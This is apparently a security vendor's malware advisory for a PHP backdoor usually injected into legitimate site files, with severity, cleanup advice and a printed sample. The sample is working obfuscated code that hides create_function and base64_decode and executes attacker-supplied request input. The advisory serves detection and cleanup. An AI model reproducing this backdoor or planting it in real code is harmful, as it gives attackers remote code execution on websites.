PRICING SUPPORT LOGIN

This is a widely seen backdoor allowing the attacker executing a code passed through the $_REQUEST variable. It's obfuscating the create_function() and base64_decode() functions using arrays and is usually injected to legitimate files.

Severity

HIGH

Affecting

This malicious code affects any vulnerable or compromised website that is configured to interpret the script language.

Cleanup

Inspect your site's files, specially theme related, to find for code you don't recognize. Look for any encoded or obfuscated PHP code.
Also, you can sign up with us and let our team remove the malware for you.

Dump

$string = $_REQUEST['sort'];
$array_name = '';
$alphabet = "wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";
$ar = array(8,38,15,7,6,4,26,25,7,34,24,25,7);
foreach($ar as $t){
$array_name .= $alphabet[$t];
}
$a = strrev("noi"."tcnuf"."_eta"."erc");
$f = $a("", $array_name($string));